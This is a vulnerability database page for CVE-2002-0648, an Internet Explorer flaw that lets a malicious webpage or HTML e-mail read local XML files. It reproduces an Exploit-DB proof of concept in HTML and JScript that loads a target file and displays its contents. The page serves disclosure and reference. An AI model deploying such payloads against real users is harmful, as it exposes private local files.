CVE-2002-0648 : Detail

CVE-2002-0648

59.28%V4
Network
2003-04-02
03h00 +00:00
2003-03-20
23h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The legacy

Exploit information

Exploit Database EDB-ID : 21749

Publication date : 2002-08-22 22h00 +00:00
Author : GreyMagic Software
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5560/info A flaw in Microsoft Internet Explorer may reveal the entire contents of XML files and partial contents of other files to attackers. This vulnerability allows an attacker to read the entire contents of XML files, and fragments of other files, existing in a known location, from a victim user's system. This vulnerability can be exploited via a malicious webpage or via malicious HTML e-mail. Other applications that use the Internet Explorer engine are affected as well (Outlook, MSN Explorer, etc.). <script language="xml" src="getFile.asp" id="oFile"></script> <script language="jscript"> onload=function () { var oXD=oFile.XMLDocument, oPE=oXD.parseError; alert( oXD.firstChild || oPE.line>0 ? "File found!\n"+ "Details:\n\n"+ (oXD.xml || "Line "+oPE.line+" contains '"+oPE.srcText+"'") : "File does not exist or could not be retrieved." ); } </script>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 5.01

Microsoft>>Internet_explorer >> Version 5.01

Microsoft>>Internet_explorer >> Version 5.01

Microsoft>>Internet_explorer >> Version 5.5

Microsoft>>Internet_explorer >> Version 5.5

Microsoft>>Internet_explorer >> Version 5.5

Microsoft>>Internet_explorer >> Version 6.0

References

http://www.securityfocus.com/bid/5560
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=103011639524314&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.